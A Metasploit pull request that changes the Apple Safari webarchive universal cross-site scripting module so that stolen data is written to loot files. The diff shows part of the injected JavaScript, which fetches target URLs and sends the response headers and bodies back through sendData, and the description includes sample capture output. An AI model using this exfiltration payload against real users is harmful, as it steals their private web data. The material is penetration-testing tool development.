### PR TITLE
Clean up the way Apple Safari UXSS aux module does data collection.

### DIFF
--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@@ -555,7 +555,6 @@ class Metasploit3 < Msf::Auxiliary
           req.open('GET', '#{url}', true);
           req.onreadystatechange = function() {
             if (req.readyState==4 && !sent) {
-              debugger;
               sendData('#{url}', {
                 response_headers: req.getAllResponseHeaders(),
                 response_body: req.responseText


### PR DESCRIPTION
RM #7918

As per @sinn3r's feature request, this PR updates the apple_safari_webarchive_uxss aux module to save stolen data in a loot file, rather than outputting it straight to the console.

Verification:
- [ ] run the module, visit the WebServer URL in any version of Safari, and you should see something like this in your console, instead of a huge dump of all the data:

```
[+] 13 chars received and stored to /Users/joe/.msf4/loot/20131006192602_default_192.168.0.6_safari.client_366605.txt
[+] 219 chars received and stored to /Users/joe/.msf4/loot/20131006192602_default_192.168.0.6_safari.client_366605.txt
[+] 5077 chars received and stored to /Users/joe/.msf4/loot/20131006192602_default_192.168.0.6_safari.client_366605.txt
[+] 66270 chars received and stored to /Users/joe/.msf4/loot/20131006192602_default_192.168.0.6_safari.client_366605.txt
[+] 8980 chars received and stored to /Users/joe/.msf4/loot/20131006192602_default_192.168.0.6_safari.client_366605.txt
```

Data is snowballed into a JSON array, and the entire JSON array is persisted to disk on new data event. Right now I create a new loot file per unique `client.peerhost`, since I didn't feel like dragging cookies into the mix.
